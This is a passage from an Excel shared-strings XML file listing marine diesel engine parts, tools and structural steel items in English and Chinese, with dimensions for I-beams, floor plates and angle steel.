    <t>LEAKAGE OIL PIPE SUPPLY UNIT</t>
  </si>
  <si>
    <t>LEAKAGE OIL PIPE EXH. VALVE DE</t>
  </si>
  <si>
    <t>LEAKAGE OIL PIPE EXH. VALVE FE</t>
  </si>
  <si>
    <t>AIR SPRING SUPPLY PIPE EXH.VALVE</t>
  </si>
  <si>
    <t>AIR SUPPLY PIPING</t>
  </si>
  <si>
    <t>AUTOMATIC VENTING UNIT</t>
  </si>
  <si>
    <t>FUEL LEAKAGE PIPE RAIL/SUP. UNIT</t>
  </si>
  <si>
    <t>DRAIN PIPES VARIOUS</t>
  </si>
  <si>
    <t>ELECTRICAL TRACE HEATING FUEL</t>
  </si>
  <si>
    <t>MAIN SWITCH</t>
  </si>
  <si>
    <t>PLUG HOLDER</t>
  </si>
  <si>
    <t>ADHESIVE TAPE</t>
  </si>
  <si>
    <t>DOCUMENTATION</t>
  </si>
  <si>
    <t>FLANGE PIECE</t>
  </si>
  <si>
    <t>APPARATUS SOCKET</t>
  </si>
  <si>
    <t>SEPARATING TERMINAL</t>
  </si>
  <si>
    <t>JUMPERS BETWEEN TERMINALS</t>
  </si>
  <si>
    <t>ELECTRONIC MODULE</t>
  </si>
  <si>
    <t>TOOL ENGINE TRANSPORT</t>
  </si>
  <si>
    <t>TOOL GENERAL CUPBOARD</t>
  </si>
  <si>
    <t>TOOL CUPBOARD</t>
  </si>
  <si>
    <t>PRISM</t>
  </si>
  <si>
    <t>WALL</t>
  </si>
  <si>
    <t>CLAMPING SLEEVE 2-PARTS</t>
  </si>
  <si>
    <t>TOOL GLAND BOX ASSEMBLY PLATFORM</t>
  </si>
  <si>
    <t>SUPPORTING PIECE</t>
  </si>
  <si>
    <t>FIXING DEVICE</t>
  </si>
  <si>
    <t>SUPPORT FOR PISTON</t>
  </si>
  <si>
    <t>PLATE STRIP</t>
  </si>
  <si>
    <t>HEX. HEAD SCREW WITH DOG POINT</t>
  </si>
  <si>
    <t>TOOL PISTON PRESSURE TESTING</t>
  </si>
  <si>
    <t>PRESS-OFF DEVICE</t>
  </si>
  <si>
    <t>TOOL PISTON RING MEASURING</t>
  </si>
  <si>
    <t>HYDRAULIC CONNECTING PIECE</t>
  </si>
  <si>
    <t>HOSE NIPPLE</t>
  </si>
  <si>
    <t>TOOL RAIL UNIT TRANSPORT</t>
  </si>
  <si>
    <t>FLANGE NUT</t>
  </si>
  <si>
    <t>TOOL SERVICE PUMP</t>
  </si>
  <si>
    <t>SPARE PARTS PUMP SERVO OIL</t>
  </si>
  <si>
    <t>SPARE PARTS INJECTION VALVE</t>
  </si>
  <si>
    <t>SPARE PARTS ELECT TRACE HEATING</t>
  </si>
  <si>
    <t>CONTROL ELEMENTS</t>
  </si>
  <si>
    <t>RELAY VOLTAGE CONTROLLED</t>
  </si>
  <si>
    <t>GUIDE TAPE</t>
  </si>
  <si>
    <t>GROOVED RING</t>
  </si>
  <si>
    <t>REDUCTION</t>
  </si>
  <si>
    <t>107.310.650.001</t>
  </si>
  <si>
    <t xml:space="preserve">ANGEL STELL </t>
  </si>
  <si>
    <t>001624121000</t>
  </si>
  <si>
    <t>Journal</t>
  </si>
  <si>
    <t>1-4H128</t>
  </si>
  <si>
    <t>Sensor unit</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>Oil mist detector controller</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>BITE TYPE TUBE</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>BITE TYPE TUBE</t>
  </si>
  <si>
    <t>H TYPE STEEL</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x1003</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x1003.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x1086.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x217.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x2859.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x293</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x331.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x458.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x513.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x558.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x606.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x640.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x645.1</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x686.8</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x721.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x743.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x744</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x757</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x785</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x808.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x812.9</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x834</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x838.4</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x891</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x893.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x921</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 125x125x6.5/9x949</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 200x100x5.5/8x1403</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 200x100x5.5/8x1500</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 200x100x5.5/8x1584</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>I-BEAM 200x100x5.5/8x1586</t>
  </si>
  <si>
    <t>H-SECTION STEEL</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>L-SECTION STEEL</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>TUBE SEMLESS</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>STPG370-S</t>
  </si>
  <si>
    <t xml:space="preserve">PLATE </t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>SEAT PLATE</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>CHANNEL STEEL125x65x6/8x299</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>CHANNEL STEEL125x65x6/8x366.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>CHANNEL STEEL125x65x6/8x840</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>CHANNELS</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>FOOT PLATE (CAM SIDE)</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>JOINT PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIVIDING PIECE FOR STARTING AIR CONTROL VALVE</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>GRIP</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">FLOAT </t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>COBER BOLT</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>STEM</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING4-PARTS</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>PIPIE</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>WELDINGFLANGE</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1010x400x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1010x644x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1115x1408x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1198x325x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1198x475x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1224x325x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1224x435x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1305.5x325x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1305.5x435x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1305.5x720x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 1408x325x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 420x420x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 450x375x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 465x377x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 465x475x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 520x329x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 520x475x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 529x720x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 540x647x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 565x462x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 565x475x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 600x400x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 612x890x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 647x400x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 660x529x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 709x1004x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 719x1004x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 719x377x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 719x463x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 719x475x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 719x612x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 719x644x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 728x400x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 728x562.5x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 750x329x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 750x475x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 815x400x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 815x540x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 862x325x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 887.5x325x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 890x463x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 900x377x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR PLATE 900x475x4.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE OF DITCH OF BED PLATE</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE SHEEL</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x2558</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x2897.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x3325</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x3425</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x400</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x492</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x536</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x561.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x565.7</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L125x75x10x707.1</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L65x65x6x1115</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L65x65x6x330</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L65x65x6x350</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L65x65x6x434</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL L65x65x6x606.5</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>JUNCTION BOX ARRANGEMENT</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN CONN. PIPE OF AIR COOLER ASSEMBLY</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>SPROCKET FOR CYLINDER LUB. OIL DRIVING GEAR</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN MAIN PIPE OF EXH. VALVE OF DRIVING OIL</t>
  </si>
  <si>
    <t>TURBOCHARGING</t>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>TENSIONER</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">HOLD FITTING </t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTOR</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPORT1</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT1</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPORT2</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT2</t>
  </si>
  <si>
    <t>LOWER SUPPORT3</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT3</t>
  </si>
  <si>
    <t>LOWER SUPPORT4</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT4</t>
  </si>
  <si>
    <t>LOWER SUPPORT5</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT5</t>
  </si>
  <si>
    <t>LOWER SUPPORT6</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT6</t>
  </si>
  <si>
    <t>LOWER SUPPORT7</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT7</t>
  </si>
  <si>
    <t>LOWER SUPPORT8</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <t>LOWER SUPPPORT8</t>
  </si>
  <si>
    <t>LOWER SUPPPORT9</t>
  </si>
  <si>
    <t>BEVEL GEAR FOR CYLINDER LUB. OIL DRIVING GEAR</t>
    <phoneticPr fontId="18" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>3/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀</t>
    </r>
  </si>
  <si>
    <r>
      <t>3/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二位三通截止阀</t>
    </r>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子接地块</t>
    </r>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔导线接地端子</t>
    </r>
  </si>
  <si>
    <r>
      <t>4/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
  </si>
  <si>
    <r>
      <t>5/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>入口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台装配零件配件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粘接剂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调直管外接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调弯管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调油头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刻度盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节阀阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧调节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧装置调整图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气导管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气滤器</t>
    </r>
  </si>
  <si>
    <r>
